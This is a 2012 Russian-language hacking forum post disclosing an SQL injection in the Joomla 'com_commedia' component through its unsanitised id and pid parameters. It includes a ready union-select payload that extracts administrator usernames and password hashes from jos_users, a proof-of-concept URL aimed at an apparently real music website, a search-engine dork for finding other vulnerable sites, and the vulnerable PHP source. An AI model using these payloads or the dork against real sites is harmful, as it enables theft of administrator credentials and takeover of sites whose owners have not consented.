14.11.2012, 22:24
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Joomla "com_commedia" component SQL Injection
Уязвим параметр id
Эксплyатация:
Код:
Code:
index.php?option=com_commedia&format=raw&task=down&pid=124&id=2238+and+1=0+union+select+concat%28username,0x3a,password,0x3a,usertype%29,2+from+jos_users+where+usertype+like+0x2561646D696E6973747261746F7225+limit+0,1+--+
POC:
Сообщение от None
http://www.radiodan[google]cemusic.com/index.php?option=com_commedia&format=raw&task=down &pid=124%27+and+1=0&id=2238+and+1=0+union+select+c oncat%28username,0x3a,password,0x3a,usertype%29,2+ from+jos_users+where+usertype+like+0x2561646D696E6 973747261746F7225+limit+1,1+--+
"inurl:com_commedia id"
Уязвимый код:
components/com_commedia/models/file.php
Сообщение от None
function DownFile($image=false/*может картинка нужна?*/) {
include_once(JPATH_SITE.DS."components".DS."com_co mmedia".DS."classes".DS."functions.php");
$db =& JFactory::getDBO();
$db->setQuery("SELECT * FROM #__commedia_settings");
$commsett = $db->loadAssocList('name');
//кодировка файловой системы
$fnames_encoding = comm_getencoding($commsett['fnames_encoding']['value']);
$db->setQuery("SELECT CONCAT(path,'/',name) as path, name
FROM `#__commedia` as c, `#__commedia_path` as cp
WHERE c.rowid=".
$_REQUEST['id']
." and cp.path_id=".
$_REQUEST['pid']
);
if (!$db->query()) $path = ''; //если не удалось выполнить, значит запретим доступ
else {
$line=$db->loadObject();
if(!$line) $path = ''; //если ничего не найдено
else {
if (strpos($line->path,'ftp://') === 0) $ftphttp = 1; //для фтп пути отдельно
else if (strpos($line->path,'http://') === 0) $ftphttp = 2; //для http пути отдельно
else {
$ftphttp = 0;
$file = JPATH_SITE.DS.str_replace('/',DS,iconv('UTF-8', $fnames_encoding,$line->path));
if ($image=='1') $file = substr($file,0,-4).'.jpg';
else if ($image=='2') $file = substr($file,0,-4).'_thumb.jpg';
}
$name = $line->name;
}
}
P.S: "_ttp://www.explo[google]it-db.com/exploits/22152/"
|
|
|